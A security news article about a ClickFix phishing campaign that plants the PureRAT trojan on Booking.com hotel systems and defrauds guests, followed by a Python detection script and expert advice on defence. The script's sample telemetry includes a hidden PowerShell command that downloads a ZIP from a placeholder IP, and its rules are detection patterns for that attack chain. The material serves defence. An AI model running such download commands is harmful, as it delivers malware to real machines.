A new phishing campaign uncovered by analysts at sekoia.io is exploiting the hospitality industry at scale, targeting both Booking.com partners and their guests in a sophisticated, multi-stage fraud scheme.
Codenamed “I Paid Twice,” the operation combines infostealing malware, social engineering, and payment fraud, effectively turning compromised hotel accounts into launchpads for attacks against unsuspecting travellers.
Hotels as the First Breach Point
The campaign, active since at least April 2025, begins with spearphishing emails sent from compromised Booking.com partner accounts. These messages, often referencing genuine reservation IDs or guest requests, are convincing because they draw directly on real booking data that attackers had already stolen through earlier malware infections on hotel systems.
Once the hotel staff click the malicious link, they’re redirected through a ClickFix infection chain, a well-known social engineering tactic that exploits browser behavior to trick users into executing a PowerShell command. That command deploys PureRAT, a Remote Access Trojan sold on underground markets, giving attackers full control over the infected device, including login access to Booking.com’s professional extranet.
From Hotel Systems to Guests’ Wallets
With control of those Booking accounts, criminals move from infiltration to monetisation. Using the hotel’s legitimate Booking.com or WhatsApp channels, they contact real guests with believable messages, often referencing the exact reservation number, check-in date, and guest name.
Victims are told there’s been a “payment verification issue” and urged to confirm their banking details through what appears to be a Booking-branded payment page. The site is a near-perfect replica, complete with Booking typography and layout, but hosted behind Cloudflare protection on infrastructure traced to a Russian bulletproof hosting provider.
Once card details are entered, funds are siphoned directly to the attackers. As the report’s title suggests, victims end up paying twice: once to the hotel, and again to the fraudsters.
A Dangerous Pair
The technical analysis from Sekoia’s Threat Detection & Response (TDR) team shows that the ClickFix infection is not only a phishing ploy, but a delivery mechanism. Victims are tricked into copying and running a PowerShell command disguised as a CAPTCHA verification.
That command pulls down a ZIP archive containing PureRAT, a modular malware capable of remote desktop control, data theft, and surveillance. Once deployed, PureRAT establishes persistence via registry keys, operates filelessly in memory, and communicates over TLS-encrypted channels using ports 56001 to 56003.
PureRAT’s developer, “PureCoder,” markets the malware as a Malware-as-a-Service (MaaS) product via Telegram bots, further industrialising access to remote control tools for less-skilled attackers.
The Cybercrime Economy Behind the Attack
Sekoia’s investigation also exposed an extensive underground marketplace built around the hospitality sector. Compromised Booking.com credentials (including admin cookies and session tokens) are openly traded on Russian-speaking cybercrime forums such as LolzTeam, Exploit.in, and WWHClub.
Prices range from a few dollars for generic logs to several thousand for high-value accounts managing multiple hotels. Some threat actors even operate Telegram bots to buy Booking logs in bulk, offering profit-sharing models to traffers, distributors who specialise in driving infected traffic from social networks and search results.
One actor, using the alias “moderator_booking,” advertises that his team has made over $20 million in this ecosystem, purchasing Booking logs for $30 to $5000 each. Over time, the same tactics have expanded to target Expedia, Airbnb, and Agoda, as attackers diversify their reach.
Detection and Defence
Sekoia’s telemetry indicates multiple detection opportunities for defenders, particularly around PowerShell misuse, registry persistence, and anomalous use of AddInProcess32.exe, which PureRAT leverages to execute malicious .NET assemblies in memory.
The company’s Defend platform flags several distinctive behaviours, including unsigned DLLs in the AppData directory and suspicious PowerShell invocations downloading from HTTP links. These markers provide early-warning opportunities for SOC teams monitoring enterprise networks.
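As an added illustration of the detection markers listed above (example code written for this page, not Sekoia’s own rules or anything from the report), the following Python runs four simple checks over a handful of constructed Sysmon-style events: a PowerShell invocation downloading from an HTTP link, an unsigned DLL loaded from AppData, AddInProcess32.exe launched by an unexpected parent, and a Run-key value pointing at a user-writable path. All paths, hosts and SIDs in the sample events are placeholders; the Run-key heuristic and the expected-parent list for AddInProcess32.exe are assumptions for the example, since the report does not say which registry keys or parent processes are involved.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

Event = Dict[str, object]

# Constructed sample telemetry, loosely modelled on Sysmon-style event fields.
# None of these paths, hosts or SIDs come from the campaign; they are placeholders.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://203.0.113.10/verify.zip -OutFile $env:TEMP\v.zip"'},
    {"type": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -c Get-Process"},                      # benign, no URL
    {"type": "image_load", "signed": False,
     "image": r"C:\Users\frontdesk\AppData\Roaming\BookingSync\update.dll"},
    {"type": "image_load", "signed": True,
     "image": r"C:\Users\frontdesk\AppData\Local\Microsoft\Teams\vendor.dll"},   # signed, ignored
    {"type": "image_load", "signed": False,
     "image": r"C:\Program Files\Vendor\helper.dll"},               # unsigned but outside AppData
    {"type": "process_create",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "parent": r"C:\Users\frontdesk\AppData\Roaming\BookingSync\loader.exe",
     "cmdline": "AddInProcess32.exe"},
    {"type": "registry_set",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\BookingSync",
     "data": r"C:\Users\frontdesk\AppData\Roaming\BookingSync\loader.exe"},
    {"type": "registry_set",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},  # normal autostart
]

HTTP_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData)\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Assumption for the example: the add-in host is normally spawned by Visual Studio.
EXPECTED_ADDIN_PARENTS = {"devenv.exe"}


def _basename(path: object) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return str(path).replace("/", "\\").rsplit("\\", 1)[-1].lower()


def powershell_http_download(ev: Event) -> Optional[str]:
    """PowerShell process whose command line carries an http(s) URL."""
    if ev.get("type") != "process_create" or _basename(ev.get("image", "")) not in POWERSHELL_IMAGES:
        return None
    m = HTTP_URL.search(str(ev.get("cmdline", "")))
    return f"PowerShell fetching {m.group(0)}" if m else None


def unsigned_dll_in_appdata(ev: Event) -> Optional[str]:
    """Image load of an unsigned DLL from a user's AppData tree."""
    if ev.get("type") != "image_load" or ev.get("signed", True):
        return None
    image = str(ev.get("image", ""))
    if "\\appdata\\" in image.lower() and image.lower().endswith(".dll"):
        return f"unsigned DLL loaded from {image}"
    return None


def addinprocess32_anomalous_parent(ev: Event) -> Optional[str]:
    """AddInProcess32.exe started by a parent outside the expected set."""
    if ev.get("type") != "process_create" or _basename(ev.get("image", "")) != "addinprocess32.exe":
        return None
    parent = _basename(ev.get("parent", ""))
    if parent not in EXPECTED_ADDIN_PARENTS:
        return f"AddInProcess32.exe spawned by {parent}"
    return None


def run_key_to_user_writable_path(ev: Event) -> Optional[str]:
    """Run/RunOnce value whose data points into AppData, Temp or ProgramData."""
    if ev.get("type") != "registry_set" or not RUN_KEY.search(str(ev.get("target", ""))):
        return None
    data = str(ev.get("data", ""))
    if USER_WRITABLE.search(data):
        return f"autostart value {ev['target']} -> {data}"
    return None


RULES: List[Callable[[Event], Optional[str]]] = [
    powershell_http_download,
    unsigned_dll_in_appdata,
    addinprocess32_anomalous_parent,
    run_key_to_user_writable_path,
]


def run_rules(events: List[Event]) -> List[Tuple[str, str]]:
    """Apply every rule to every event; return (rule name, summary) pairs for hits."""
    alerts: List[Tuple[str, str]] = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append((rule.__name__, hit))
    return alerts


if __name__ == "__main__":
    for name, summary in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] {summary}")
```

Each rule is deliberately narrow so it stays explainable to an analyst; in production these would be tuned against the fleet's baseline (for example, which parents legitimately launch AddInProcess32.exe) rather than the single assumed value used here.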
A Professionalised Fraud Model
Sekoia analysts conclude that this campaign reflects a broader, professionalised trend in cybercrime: turnkey fraud-as-a-service targeting the hospitality supply chain. Each step, from credential theft to guest phishing, is now an outsourced service in a global underground market.
By blending malware, social engineering, and real booking data, the “I Paid Twice” operation demonstrates how even trusted digital platforms can be weaponised against both businesses and consumers.
Sekoia says it will continue to track the infrastructure and actors behind the campaign, strengthening detection rules and sharing indicators of compromise with its customers.
No Shortage of Creativity
When it comes to social engineering and identity compromise, threat actors have no shortage of creativity, and these recent campaigns are a great example of that, says James Maude, Field CTO at BeyondTrust. “While the hook used is new, the actual target is not: privileged accounts and credentials. The fact that in 2025 these types of attack are still successful speaks to the challenges of identity security we now face, where it just takes one credential, one identity, and the right level of privilege and access for an attacker to succeed.”
Many organizations struggle to deal with these constantly morphing attacks because they rely too heavily on detection. Increasingly, with these attack chains, there is little to detect, and by the time something is detected, the damage is done.
Maude says the physics of cyber security is very simple: the fewer privileges the user holds, including the ability to launch unknown applications, the less risk there is. “The reason cyber-attacks are on the rise, despite record investments in security technology, is due to the abundant identity attack surface in most organizations. We need to regain visibility and control of all our paths to privilege before threat actors find them for us.”
Some of the most effective defenses against these ClickFix campaigns include removing local admin rights, to mitigate the risk of malware impacting the entire system, and application control, to prevent unknown payloads and high-risk applications like PowerShell from executing. These proactive measures can greatly reduce the attack surface and proactively mitigate a wide range of attack techniques, Maude adds.
Phishing-resistant MFA
Louis Eichenbaum, Federal CTO at ColorTokens says phishing attacks are nothing new. “Our adversaries have used them for years because they work and they continue to work. It only takes one user clicking a malicious link for an attacker to gain a foothold inside your network. Once in, they begin scanning, probing for weaknesses, and looking for pathways to move laterally toward high-value systems. And no matter how much awareness training you provide, there will always be someone who falls for a well-crafted phishing email.”
He says mitigating this risk starts with implementing phishing-resistant multi-factor authentication. “Even if an attacker steals credentials, they won’t be able to successfully use them. The next critical step is establishing an effective microsegmentation strategy. By identifying your most critical assets and placing security controls as close as possible to those systems, you dramatically reduce an attacker’s ability to move laterally inside your environment.”
The reality is simple: user laptops will be compromised. “But with phishing-resistant MFA and strong microsegmentation, you can ensure that even when an attacker gets in, they cannot reach or impact your mission-critical systems,” Eichenbaum adds.
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.